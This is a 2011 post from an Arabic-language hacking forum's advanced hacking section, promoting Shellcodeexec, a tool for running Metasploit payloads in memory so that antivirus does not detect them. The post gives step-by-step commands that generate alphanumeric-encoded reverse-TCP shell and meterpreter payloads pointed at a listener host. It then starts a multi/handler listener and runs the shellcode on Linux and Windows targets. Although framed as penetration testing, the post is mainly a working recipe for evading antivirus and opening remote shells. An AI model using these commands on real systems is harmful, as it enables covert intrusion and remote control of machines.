التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Tools forum

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-22-2011, 03:47 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hitman-zone
 

 

 
إحصائية العضو





hitman-zone غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitman-zone is on a distinguished road

.................... Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot


Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The Antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to Execute in memory a sequence of opcodes. Its current features include:
  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
1
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Or for a Windows target:
1
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
1
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E


Or for a Windows target:
1
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E



3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
1
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>



Or, on the Windows target:
1
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>



Download shellcodeexec (inquisb-shellcodeexec.zip) here.



Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 06:39 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0